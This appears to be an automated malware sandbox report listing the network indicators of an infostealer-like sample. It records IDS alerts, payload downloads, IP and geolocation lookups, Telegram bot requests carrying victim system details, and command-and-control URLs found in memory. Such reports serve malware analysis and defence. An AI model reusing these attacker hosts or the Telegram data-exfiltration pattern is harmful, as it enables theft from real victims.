Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49760 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49767 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49776 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49774 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49789 -> 188.114.97.3:443

Source: global traffic

TCP traffic: 192.168.2.4:49770 -> 208.91.198.176:587

Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49787 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:33:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:03:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:23:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: amazonenviro.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.techniqueqatar.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:58:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:58:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:58:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: yxU3AgeVTi.exe, 00000000.00000002.1688225604.000000000076E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/
Source: yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020733000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.00000000206F7000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg
Source: yxU3AgeVTi.exe, 00000000.00000002.1688225604.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsge
Source: yxU3AgeVTi.exe, 00000000.00000002.1688225604.000000000076E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgf
Source: yxU3AgeVTi.exe, 00000000.00000002.1688225604.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg4
Source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
